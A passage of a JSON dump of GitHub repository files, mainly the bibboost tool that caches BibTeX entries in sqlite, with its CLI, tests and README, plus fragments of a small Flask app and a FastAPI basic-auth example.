"text": "import argparse\nimport os\nimport logging\nimport subprocess\nimport sys\n\nfrom pybtex.utils import OrderedCaseInsensitiveDict\n\nimport bibboost.aux\nimport bibboost.cache\n\n\ndef run(aux_file, cache_file, bibboost_bib_file):\n \"\"\"\n This function assumes that we are in the folder of aux_file, and that aux_file is just a `basename`\n :param aux_file: the aux file the user want to process\n :param cache_file: the file in which the cache will be stored\n :param bibboost_bib_file: the file which contains the resulting bibtex entries\n :return:\n \"\"\"\n bib_files, citations = bibboost.aux.parse_aux_file(aux_file)\n\n with bibboost.cache.CacheBib(cache_file) as cache:\n cache.update_db(bib_files)\n used_entries = OrderedCaseInsensitiveDict(\n (key, entry) for key, entry in cache.get_entries(citations)\n )\n\n missed_entries = [key for key in citations if key not in used_entries]\n if len(missed_entries) > 0:\n logging.warning(\"missing entries: {}\".format(\", \".join(missed_entries)))\n\n with open(bibboost_bib_file, \"w\") as f:\n f.write(\"\"\"% This file is generated by bibboost\n% It should not be modified manually\n\n\n\"\"\")\n f.write(\"\\n\\n\".join(e for e in used_entries.itervalues()))\n\n bibboost.aux.change_bib_file(aux_file, bibboost_bib_file)\n\n\ndef main():\n logging.basicConfig(format='bibboost:%(levelname)s:%(message)s', level=logging.DEBUG)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"auxfile\", metavar=\"file.aux\", type=str,\n help=\"aux file with or without .aux extension (example: `paper.aux`, `mypaper`)\")\n parser.add_argument(\"--run-bibtex\", action=\"store_true\", help=\"execute bibtex when done\")\n args = parser.parse_args()\n\n aux_file = args.auxfile\n if not aux_file.endswith(\".aux\"):\n aux_file += \".aux\"\n\n if not os.path.isfile(aux_file):\n logging.error(\"file `{}` does not exist\".format(aux_file))\n sys.exit(1)\n\n aux_dir = os.path.dirname(aux_file)\n aux_file = os.path.basename(aux_file)\n if aux_dir != \"\":\n os.chdir(aux_dir)\n\n # From now on, we are in the `aux file` directory\n\n cache_file = aux_file[:-4] + \".bibboost.cache\"\n bibboost_bib_file = aux_file[:-4] + \".bibboost.bib\"\n\n run(aux_file, cache_file, bibboost_bib_file)\n\n if args.run_bibtex:\n logging.info(\"run `bibtex {}`\".format(aux_file))\n subprocess.call([\"bibtex\", aux_file])\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.683920681476593,
"alphanum_fraction": 0.691629946231842,
"avg_line_length": 23.513513565063477,
"blob_id": "7660882a794db7fee5bf956cc9c05e85d34cfa11",
"content_id": "5262cc78212f089699759b90dade50fe8203c241",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 908,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 37,
"path": "/Makefile",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": ".PHONY: all clean mrproper test FORCE\n\nPYTHON3=python3\n\nall: build/bibboost.pyz\n\nbuild/bibboost.pyz: build/venv/bin/activate requirements.txt $(wildcard bibboost/*) $(wildcard bibboost/**/*)\n\tmkdir -p build/bibboost\n\tcp -R bibboost build/bibboost/bibboost\n\t\n\tset -e; \\\n\tsource build/venv/bin/activate; \\\n\tcd build; \\\n\tpython3 -m pip install -r ../requirements.txt -t bibboost; \\\n\trm -rf bibboost/pybtex/tests bibboost/*.dist-info; \\\n\tfind bibboost -name '__pycache__' -delete; \\\n\tfind bibboost -regex '.*\\.py[co]$$' -delete; \\\n\tpython3 -m zipapp bibboost -m \"bibboost.__main__:main\" -p \"/usr/bin/env python3\"\n\nbuild/venv/bin/activate:\n\tmkdir -p build\n\t$(PYTHON3) -m venv build/venv\n\t\n\tset -e; \\\n\tsource build/venv/bin/activate; \\\n\tpython3 -m pip install --upgrade pip\n\ntest:\n\tcd test && $(MAKE) test\n\nclean:\n\tcd test && $(MAKE) clean\n\trm -rf build/venv\n\trm -rf build/bibboost\n\nmrproper: clean\n\trm -rf build\n\n"
},
{
"alpha_fraction": 0.6758813858032227,
"alphanum_fraction": 0.6806890964508057,
"avg_line_length": 20.341880798339844,
"blob_id": "1f0e66c9fee58e64b5b8f2b8f8f4bc6d9786aadf",
"content_id": "f65d405c6565dd11500fea70528bb687181896ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2496,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 117,
"path": "/test/test.bats",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bats\n\nclean() {\n make clean\n}\n\nsetup() {\n clean\n}\n\nteardown() {\n clean\n}\n\nload 'test_helper/bats-support/load'\nload 'test_helper/bats-assert/load'\n\n@test \"bibtex_micro\" {\n FILE=bibtex_micro\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n bibtex $FILE\n assert_success\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_micro --run-bibtex\" {\n FILE=bibtex_micro\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py --run-bibtex $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_micro_missing\" {\n FILE=bibtex_micro_missing\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n assert_line 'bibboost:WARNING:missing entries: missing'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n assert_line 'bibboost:WARNING:missing entries: missing'\n\n bibtex $FILE\n assert_success\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_large\" {\n FILE=bibtex_large\n\n run pdflatex $FILE.tex\n assert_success\n\n run python3 ../bibboost.py $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run python3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n bibtex $FILE\n assert_success\n\n run pdflatex $FILE.tex\n assert_success\n}\n\n@test \"bibtex_micro pypy3 (requires pypy3 installed)\" {\n FILE=bibtex_micro\n\n run pdflatex $FILE.tex\n assert_success\n\n run pypy3 ../bibboost.py --run-bibtex $FILE.aux\n assert_success\n assert_line 'bibboost:INFO:SQL cache database out of date. Recreating it...'\n\n run pypy3 ../bibboost.py $FILE\n assert_success\n assert_line 'bibboost:INFO:SQL cache database up to date'\n\n run pdflatex $FILE.tex\n assert_success\n}"
},
{
"alpha_fraction": 0.6781609058380127,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 16.600000381469727,
"blob_id": "02849a5f8d3572aeddfd2f6a94ed644d302c19dd",
"content_id": "f7cb208da937a1fef68ae942b8e077def9074c68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/bibboost.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport runpy\n\nrunpy.run_module(\"bibboost\", run_name=\"__main__\")"
},
{
"alpha_fraction": 0.5343202948570251,
"alphanum_fraction": 0.5343202948570251,
"avg_line_length": 31.794116973876953,
"blob_id": "862dbdc007acd37924d913bb2d5d49dd1809493a",
"content_id": "7657e90afaf35949fceeb6e9b5cb619f38ef7567",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2229,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 68,
"path": "/bibboost/aux.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "import re\nimport fileinput\n\n\ndef get_canonical_bib_file(name: str) -> str:\n name = name.strip()\n if not name.endswith(\".bib\"):\n name += \".bib\"\n return name\n\n\n_citation_re = re.compile(r\"^\\\\citation\\{(?P<key>[^\\}]+)\\}$\")\n_bib_files_re = re.compile(r\"^\\\\bibdata\\{(?P<files>[^}]+)\\}$\")\n_bibboost_bib_files_re = re.compile(r\"^%\\\\bibboostdata\\{(?P<files>[^}]+)\\}$\")\n\n\ndef parse_aux_file(aux_file_name):\n with open(aux_file_name) as f:\n citations = []\n bib_files = []\n bibboost = False # True, if bibboost was actually used\n\n for line in f:\n p = _citation_re.match(line)\n if p is not None:\n citations.append(p.group(\"key\"))\n continue\n\n p = _bibboost_bib_files_re.match(line)\n if p is not None:\n if bib_files:\n raise ValueError(\"\\\\bibboostdata present twice in aux file or present after \\\\bibdata.\")\n bib_files = p.group(\"files\").split(\",\")\n bibboost = True\n\n p = _bib_files_re.match(line)\n if (p is not None) and not bibboost:\n if bib_files:\n raise ValueError(\"\\\\bibdata present twice in aux file. bibboost only supports one \\\\bibdata.\")\n bib_files = p.group(\"files\").split(\",\")\n\n bib_files = [get_canonical_bib_file(name) for name in bib_files]\n\n return bib_files, citations\n\n\ndef change_bib_file(aux_file_name, bib_file_name):\n \"\"\"\n Change the bib files used in `aux_file_name` into `bib_file_name`\n and replace the line `\\bibdata` into `%\\bibboostdata`\n :param aux_file_name:\n :param bib_file_name:\n :return:\n \"\"\"\n with fileinput.FileInput(aux_file_name, inplace=True) as f:\n bibboost = False\n for line in f:\n p = _bibboost_bib_files_re.match(line)\n if p is not None:\n bibboost = True\n\n p = _bib_files_re.match(line)\n if p is not None:\n if not bibboost:\n print(line.replace(\"\\\\bibdata\", \"%\\\\bibboostdata\"), end=\"\")\n print(\"\\\\bibdata{{{}}}\".format(bib_file_name))\n else:\n print(line, end=\"\")"
},
{
"alpha_fraction": 0.6101694703102112,
"alphanum_fraction": 0.6101694703102112,
"avg_line_length": 12.222222328186035,
"blob_id": "4925d4a3bc55db0a397ebfe7bf86252969645977",
"content_id": "908e7ff8f1f8db034031f526bc078131363cd55c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 9,
"path": "/test/Makefile",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": ".PHONY: clean test\n\nBATS=bats\n\ntest:\n\t$(BATS) test.bats\n\nclean:\n\trm -f *.blg *.aux *.bbk *.bibboost* *.log *.pdf *.bbl"
},
{
"alpha_fraction": 0.7401241660118103,
"alphanum_fraction": 0.7452031373977661,
"avg_line_length": 31.227272033691406,
"blob_id": "4785f7629cc4db9745e621417146436dc6f3a01b",
"content_id": "c1911ebde298e9ef58af66758c30ad31071db26c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3544,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 110,
"path": "/README.md",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "# BibBoost: Caching Bib Files for BibTeX\n\nBibBoost automatically extracts entries from LaTeX `aux` files and caches large `bib` files automatically into a `sqlite3` database, in order to significantly speed up the generation of the bibliography.\n\n*Warning:* The software is an alpha software. It has only be tested on very simple LaTeX / BibTeX examples and might fail on more complex examples.\n\n*Warning:* THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED.\n\n### Requirements\n\nTo use BibBoost from the Git sources:\n\n- `python3` required\n- packages specified in `requirements.txt`: `python3 -m pip install -r requirements.txt`\n- `pypy3` optional but recommended\n\nTo use the standalone BibBoost (see the Standalone Application section):\n\n- `python3` required\n- `pypy3` optional but recommended\n\nFor development, testing, generation of the standalone version, in addition to all the above:\n\n- `pypy3` required\n- `virtualenv` required: `python3 -m pip install virtualenv`\n- `bats` <https://github.com/sstephenson/bats>\n- running `git submodule update --init`\n\n### Getting Started\n\nBibBoost can be used as a drop-in replacement for BibTex.\nInstead of running\n\n bibtex mylatexfile.aux\n\nyou can run\n\n python3 bibboost.py mylatexfile.aux\n bibtex mylatexfile.aux\n\nor\n\n python3 bibboost.py --run-bibtex mylatexfile.aux\n\nor (recommended if `pypy3` is installed)\n\n pypy3 bibboost.py mylatexfile.aux\n bibtex mylatexfile.aux\n\nor\n\n pypy3 bibboost.py --run-bibtex mylatexfile.aux\n \nThe first execution after any change to any `bib` file might be slow as the database `mylatexfile.bibboost.cache` needs to be created.\nSubsequent executions should be much faster (assuming the number of citations in the LaTeX file is much smaller than the number of entries in the bib files).\n\n### FAQ\n\n#### How Does it Work?\n\nBibBoost reads the `aux` file to find the list of `bib` files used.\nThe first time BibBoost is used or after any modification of the `bib` files (including the order of files, as BibTeX is sensitive to order), BibBoost parses the `bib` files and store each BibTeX entry into a `sqlite3` database `<aux file>.bibboost.cache`.\nChanges of `bib` files are detected using the date of last modification.\n\nThen, BibBoost, extracts from the `sqlite3` database the entries used in the `aux` file into the file `<aux file>.bibboost.bib`.\n\nFinally, it modifies the the `aux` file to point to `<aux file>.bibboost.bib` instead of the original `bib` files (it also adds a special line in the `<aux file>` to remember the original `bib` files for future execution).\n\nIf the option `--run-bibtex` is given, BibBoost automatically runs `bibtex`.\n\n#### What Should I Do with the `*.bibboost*` files?\n\n`*.bibboost*` files are similar to `*.aux`, `*.log`, ...\nThese files should *not* be committed on a Git folder.\n\n#### Nothing is Working. What Should I Do?\n\nStart by removing all the `*.bibboost*` files.\n\n#### Is `Biber`, `natbib`, `biblatex`, ...?\n\nThis is an early alpha software.\nNone of these configurations have been tested.\n\n#### Is `nocite{*}` Supported?\n\nNo and we do not plan to support it as it completely defeats the purpose of BibBoost.\n\n### Standalone Application\n\nFor easy distribution, it is possible to generate a standalone application by running:\n\n make\n\nThe resulting application is generated in `build/bibboost.pyz`.\nIt only requires `python3` to run correctly.\nIt can then be used as:\n\n python3 bibboost.pyz\n\nor (recommended)\n\n pypy3 bibboost.pyz\n\n\n### Testing\n\nRun\n\n make test"
},
{
"alpha_fraction": 0.5577725172042847,
"alphanum_fraction": 0.5588608980178833,
"avg_line_length": 28.961956024169922,
"blob_id": "b5397beab4d14f2456824191782bfee0f6298866",
"content_id": "6277734f3d12b336cb3861c26df13fef62c1032c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5513,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 184,
"path": "/bibboost/cache.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
"text": "import io\nimport logging\nimport os\nimport sqlite3\n\nimport pybtex.database.input.bibtex\nimport pybtex.database.output.bibtex\nimport pybtex.database\nfrom pybtex.utils import OrderedCaseInsensitiveDict\n\n\nclass FastWriter(pybtex.database.output.bibtex.Writer):\n \"\"\"\n A version of bibtex Writer which bypass some slow operations\n knowing that the entries we are using are well-formed\n (might create bugs... not completely checked)\n \"\"\"\n\n def _encode(self, s):\n return s # bypass encoding, as encoding is very slow and normally we don't have issues with encoding\n\n def check_braces(self, s):\n return # bypass checking braces\n\n def write_entry_stream(self, key, entry, stream):\n stream.write('@%s' % entry.original_type)\n stream.write('{%s' % key)\n for role, persons in entry.persons.items():\n self._write_persons(stream, persons, role)\n for type, value in entry.fields.items():\n self._write_field(stream, type, value)\n stream.write('\\n}\\n')\n\n def entry_to_string(self, key, entry):\n stream = io.StringIO() if self.unicode_io else io.BytesIO()\n self.write_entry_stream(key, entry, stream)\n return stream.getvalue()\n\n\nclass CacheBib:\n def _create_tables(self):\n self.con.execute(\"\"\"CREATE TABLE IF NOT EXISTS bib_file (\n id INTEGER PRIMARY KEY ASC, /* must be 0,1,2,3, ... in order of inclusion */\n name TEXT NOT NULL,\n timestamp INTEGER NOT NULL\n );\"\"\")\n self.con.execute(\"\"\"CREATE TABLE IF NOT EXISTS entry (\n key TEXT NOT NULL PRIMARY KEY,\n entry TEXT NOT NULL/*,\n bib_file_id INTEGER NOT NULL,\n FOREIGN KEY(bib_file_id) REFERENCES bib_file(id) ON DELETE CASCADE */\n );\"\"\")\n self.con.commit()\n\n def __init__(self, filename):\n self.con = sqlite3.connect(filename)\n self._create_tables()\n\n self.bibtex_writer = FastWriter()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, tb):\n self.close()\n\n def close(self):\n self.con.close()\n\n def is_db_up_to_date(self, bib_files):\n \"\"\"\n Check whether the database contains exactly the current bib_files\n :param bib_files:\n :return:\n \"\"\"\n\n t = [\n (i, name, os.path.getmtime(name))\n for i, name in enumerate(bib_files)\n ]\n return self.con.execute(\"\"\"SELECT id, name, `timestamp` FROM bib_file;\"\"\").fetchall() == t\n\n def update_db(self, bib_files):\n \"\"\"\n Update the database to match the bib_files\n If name/order/timestamp do not match, the database is re-created\n :param bib_files: ordered list of bibtex files\n :return:\n \"\"\"\n\n if self.is_db_up_to_date(bib_files):\n logging.info(\"SQL cache database up to date\")\n return\n\n logging.info(\"SQL cache database out of date. Recreating it...\")\n\n # Remove everything\n self.con.execute(\"DROP TABLE bib_file;\")\n self.con.execute(\"DROP TABLE entry;\")\n self._create_tables()\n\n # and add back files and entries\n self.add_bib_files_with_entries(bib_files)\n self.con.commit()\n\n def get_entries(self, keys):\n \"\"\"\n\n :param keys:\n :return: an array of tuple (key, entry) of found entries\n \"\"\"\n\n return self.con.execute(\n \"\"\"SELECT `key`, `entry` FROM entry WHERE `key` in ({})\"\"\".format(\",\".join([\"?\"] * len(keys))), keys\n ).fetchall()\n\n def gen_entry_bibtex(self, key, entry):\n \"\"\"\n Return the bibtex corresponding to an entry\n :param entry:\n :return:\n \"\"\"\n\n return self.bibtex_writer.entry_to_string(key, entry)\n\n def add_bib_files_with_entries(self, bib_files):\n \"\"\"\n\n Does not commit the transaction\n :param bib_files:\n :return:\n \"\"\"\n\n # person_fields = [] so that pybtex does not try parsing persons\n bib_parser = pybtex.database.input.bibtex.Parser(person_fields=[])\n bib_data = None\n for (i, bib_file) in enumerate(bib_files):\n self.add_bib_file(i, bib_file)\n bib_data = bib_parser.parse_file(bib_file)\n\n entries = [(key, self.gen_entry_bibtex(key, entry)) for key, entry in bib_data.entries.items()]\n\n self.add_entries(entries)\n\n def add_bib_file(self, bib_file_id, file_name):\n \"\"\"\n Does not add entries\n Does not commit the transaction\n Does not add the corresponding entries\n :param bib_file_id:\n :param file_name:\n :return:\n \"\"\"\n timestamp = os.path.getmtime(file_name)\n self.con.execute(\"\"\"INSERT INTO bib_file (\n id,\n name,\n `timestamp`\n )\n VALUES (\n ?,\n ?,\n ?\n );\n \"\"\",\n (bib_file_id, file_name, timestamp))\n\n def add_entries(self, entries):\n \"\"\"\n Throws an error if an entry is already present.\n Does not commit the transaction.\n :param entries: list of pairs (key, entry), where entry is a Bibtex string\n :return:\n \"\"\"\n self.con.executemany(\"\"\"INSERT INTO entry (\n key,\n entry\n )\n VALUES (\n ?,\n ?\n ); \n \"\"\",\n entries)\n"
}
] | 8 |
Kieranhak/old-sjk-game
|
https://github.com/Kieranhak/old-sjk-game
|
44ce2bfdccac2414b1f269758353ca5a46b6ca49
|
4211b13a4bce9acc475953d4281dca1716a1d9ec
|
55d54df62c09530130a02c82a4afefb715d16a26
|
refs/heads/master
| 2021-08-29T16:36:46.271751 | 2017-12-14T10:01:15 | 2017-12-14T10:01:15 | 114,233,790 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5096081495285034,
"alphanum_fraction": 0.5288243889808655,
"avg_line_length": 36.11888122558594,
"blob_id": "f09ca923c6580bc46707e7e8cdc8f761831220ba",
"content_id": "65b3d6dd4347b29a8d824a138c85734229bc46be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5308,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 143,
"path": "/README.md",
"repo_name": "Kieranhak/old-sjk-game",
"src_encoding": "UTF-8",
"text": "from time import sleep\nfrom scene import *\nimport ui\nimport sound\nA = Action\n\nclass ButtonNode (SpriteNode):\n\tdef __init__(self, title, *args, **kwargs):\n\t\tSpriteNode.__init__(self, 'pzl:Button1', *args, **kwargs)\n\t\tbutton_font = ('Avenir Next', 20)\n\t\tself.title_label = LabelNode(title, font=button_font, color='black', position=(0, 1), parent=self)\n\t\tself.title = title\n\nclass MenuScene (Scene):\n\tdef __init__(self, title, subtitle, button_titles):\n\t\tScene.__init__(self)\n\t\tself.title = title\n\t\tself.subtitle = subtitle\n\t\tself.button_titles = button_titles\n\t\t\n\tdef setup(self):\n\t\tbutton_font = ('Avenir Next', 20)\n\t\ttitle_font = ('Avenir Next', 36)\n\t\tnum_buttons = len(self.button_titles)\n\t\tself.bg = SpriteNode(color='black', parent=self)\n\t\tbg_shape = ui.Path.rounded_rect(0, 0, 240, num_buttons * 64 + 140, 8)\n\t\tbg_shape.line_width = 4\n\t\tshadow = ((0, 0, 0, 0.35), 0, 0, 24)\n\t\tself.menu_bg = ShapeNode(bg_shape, (1,1,1,0.9), '#15a4ff', shadow=shadow, parent=self)\n\t\tself.title_label = LabelNode(self.title, font=title_font, color='black', position=(0, self.menu_bg.size.h/2 - 40), parent=self.menu_bg)\n\t\tself.title_label.anchor_point = (0.5, 1)\n\t\tself.subtitle_label = LabelNode(self.subtitle, font=button_font, position=(0, self.menu_bg.size.h/2 - 100), color='black', parent=self.menu_bg)\n\t\tself.subtitle_label.anchor_point = (0.5, 1)\n\t\tself.buttons = []\n\t\tfor i, title in enumerate(reversed(self.button_titles)):\n\t\t\tbtn = ButtonNode(title, parent=self.menu_bg)\n\t\t\tbtn.position = 0, i * 64 - (num_buttons-1) * 32 - 50\n\t\t\tself.buttons.append(btn)\n\t\tself.did_change_size()\n\t\tself.menu_bg.scale = 0\n\t\tself.bg.alpha = 0\n\t\tself.bg.run_action(A.fade_to(0.4))\n\t\tself.menu_bg.run_action(A.scale_to(1, 0.3, TIMING_EASE_OUT_2))\n\t\tself.background_color = 'red'\n\t\t\n\tdef did_change_size(self):\n\t\tself.bg.size = self.size + (2, 2)\n\t\tself.bg.position = self.size/2\n\t\tself.menu_bg.position = self.size/2\n\t\n\tdef touch_began(self, touch):\n\t\ttouch_loc = self.menu_bg.point_from_scene(touch.location)\n\t\tfor btn in self.buttons:\n\t\t\tif touch_loc in btn.frame:\n\t\t\t\tsound.play_effect('8ve:8ve-tap-resonant')\n\t\t\t\tbtn.texture = Texture('pzl:Button2')\n\t\n\tdef touch_ended(self, touch):\n\t\ttouch_loc = self.menu_bg.point_from_scene(touch.location)\n\t\tfor btn in self.buttons:\n\t\t\tbtn.texture = Texture('pzl:Button1')\n\t\t\tif self.presenting_scene and touch_loc in btn.frame:\n\t\t\t\tnew_title = self.presenting_scene.menu_button_selected(btn.SJK)\n\t\t\t\tif new_title:from time import sleep\n\n\n\t\t\tbtn.texture = Texture('pzl:Button1')\n\t\t\tif self.presenting_scene and touch_loc in btn.frame:\n\t\t\t\tnew_title = self.presenting_scene.menu_button_selected(btn.SJK)\n\t\t\t\tif new_title:\n\t\t\t\t\tbtn.title = new_title\n\t\t\t\t\tbtn.title_label.text = new_title\n\nif __name__ == '__main__':\n\trun(MenuScene('SJK', 'Our game', ['Start']))\nwhile True:\n\tdirections=[\"west\", \"north\", \"south\", \"east\"]\n\tchoice=input(\"what direction do you want to go \") \n if choice==\"west\":\n print(\" __ \")\n print(\" __ _ __ ____ _______/ |_ \")\n print(\"\\ \\/ \\/ // __ \\ / ___/\\ __\\ \")\n print(\" \\ /\\ ___/ \\___ \\ | | \")\n print(\" \\/\\_/ \\___ >____ > |__| \")\n print(\" \\/ \\/ \")\n sleep(2)\n print(directions)\n print(\"too bad you lost, you fell off a clif \")\n elif choice==\"north\":\n print(\" ____ ____________/ |_| |__ \")\n print(\" / \\ / _ \\_ __ \\ __\\ | \\ \")\n print(\"| | ( <_> ) | \\/| | | Y \\ \")\n print(\"|___| /\\____/|__| |__| |___| /\")\n print(\" \\/ \\/ \")\n sleep(2)\n print(directions)\n print(\"haha, you lost, dead end \")\n elif choice==\"south\":\n print(\" __ __ \")\n print(\" __________ __ ___/ |_| |__ \")\n print(\" / ___/ _ \\| | \\ __\\ | \\ \")\n print(\" \\___ ( <_> ) | /| | | Y \\ \")\n print(\"/____ >____/|____/ |__| |___| / \")\n print(\" \\/ \\/ \") \n sleep(2)\n print(directions)\n print(\"no you lost, you got ran over\")\n elif choice==\"east\":\n print(\" __ \")\n print(\" ____ _____ _______/ |_ \")\n print(\"_/ __ \\\\__ \\ / ___/\\ __\\ \")\n print(\"\\ ___/ / __ \\_\\___ \\ | | \")\n print(\" \\___ >____ /____ > |__| \")\n print(\" \\/ \\/ \\/ \")\n sleep(2)\n print(directions)\n print(\"well done, you won you get 200 million\")\n\tbreak\n else:\n print(\"not a direction you can go\")\nwhile True:\n\tprint(\"welcome to level 2\")\n\tdoors=[\"doors 1\", \"door 2\", \"door 3\", \"door 4\"]\n\tchoice=input(\"what door do you want to go through be wise pick the wrong one you will DIE!! \") \n if choice==\"door 1\":\n sleep(2)\n print(directions)\n print(\"well done, you played youreself, you ran into a killer\")\n elif choice==\"door 2\":\n sleep(2)\n print(directions)\n print(\"haha, you lost, try again dumbie\")\n elif choice==\"door 3\":\n sleep(2)\n print(directions)\n print(\"well done, you won you get 200 million\")\n\tbreak\n elif choice==\"door 4\":\n sleep(2)\n print(directions)\n print(\"lol you need jesus to help you\")\n else:\n print(\"not a direction you can go\")\n"
}
] | 1 |
k8k/HBHTML
|
https://github.com/k8k/HBHTML
|
647aa79e5b0590b33093c7680d3686c6468bf61a
|
7bb0016b458016290b3ae69d7a992fd5f683e605
|
583cd8cf9ec80de0bdc6bf85d64803cd29b23986
|
refs/heads/master
| 2021-01-01T06:49:50.621019 | 2014-10-15T22:55:08 | 2014-10-15T22:55:08 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5870901346206665,
"alphanum_fraction": 0.6475409865379333,
"avg_line_length": 17.092592239379883,
"blob_id": "b960e40406b5956fc23bd66ee0f53d642e572748",
"content_id": "d924294d47cc60e9625cb77d8e23c192b9587b17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 54,
"path": "/run_trial.py",
"repo_name": "k8k/HBHTML",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\[email protected](\"/001\")\ndef trial1():\n return render_template(\"trial1.html\")\n\[email protected](\"/002\")\ndef trial2():\n return render_template(\"trial2.html\")\n\[email protected](\"/003\")\ndef trial3():\n return render_template(\"trial3.html\")\n\[email protected](\"/004\")\ndef trial4():\n return render_template(\"trial4.html\")\n\[email protected](\"/005\")\ndef trial5():\n return render_template(\"trial5.html\")\n\[email protected](\"/006\")\ndef trial6():\n return render_template(\"trial6.html\") \n\[email protected](\"/007\")\ndef trial7():\n return render_template(\"trial7.html\") \n\[email protected](\"/008\")\ndef trial8():\n return render_template(\"trial8.html\")\n\n\[email protected](\"/009\")\ndef trial9():\n return render_template(\"trial9.html\")\n\[email protected](\"/010\")\ndef trial10():\n return render_template(\"trial10.html\")\n\[email protected](\"/011\")\ndef trial11():\n return render_template(\"trial11.html\")\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)"
}
] | 1 |
benlau6/fastapi-pynamodb-lambda-versioning
|
https://github.com/benlau6/fastapi-pynamodb-lambda-versioning
|
194fa94a58ff1164e19d8f53234968fc62030e25
|
8ae8801c9b92137340c837cd5696d40fe0b014c8
|
4fe73625fc541f9839ca590a82329d8ab6a32ef7
|
refs/heads/main
| 2023-07-10T17:54:41.403574 | 2021-08-13T04:03:08 | 2021-08-13T04:03:08 | 360,108,665 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7204819321632385,
"alphanum_fraction": 0.7240963578224182,
"avg_line_length": 35.08695602416992,
"blob_id": "d551320d322e1602f4f81d3aa98d703c08d28ed8",
"content_id": "f68ae43e6f6a255e6897c8e6e21b3b650797c389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 830,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 23,
"path": "/app/api/v1/endpoints/login.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from fastapi import APIRouter, Depends, HTTPException, status\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nimport secrets\n\nrouter = APIRouter()\n\nsecurity = HTTPBasic()\n\ndef get_current_username(credentials: HTTPBasicCredentials = Depends(security)):\n correct_username = secrets.compare_digest(credentials.username, \"user\")\n correct_password = secrets.compare_digest(credentials.password, \"password\")\n if not (correct_username and correct_password):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect username or password\",\n headers={\"WWW-Authenticate\": \"Basic\"},\n )\n return credentials.username\n\n\[email protected](\"/me\")\ndef read_current_user(username: str = Depends(get_current_username)):\n return {\"username\": username}\n"
},
{
"alpha_fraction": 0.7351351380348206,
"alphanum_fraction": 0.745945930480957,
"avg_line_length": 21.375,
"blob_id": "1c3b5ead9d0564b7e30a2b378530992804035601",
"content_id": "40ba396a238c6f3baa3a96f14a307a49bf29dfb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/Dockerfile",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
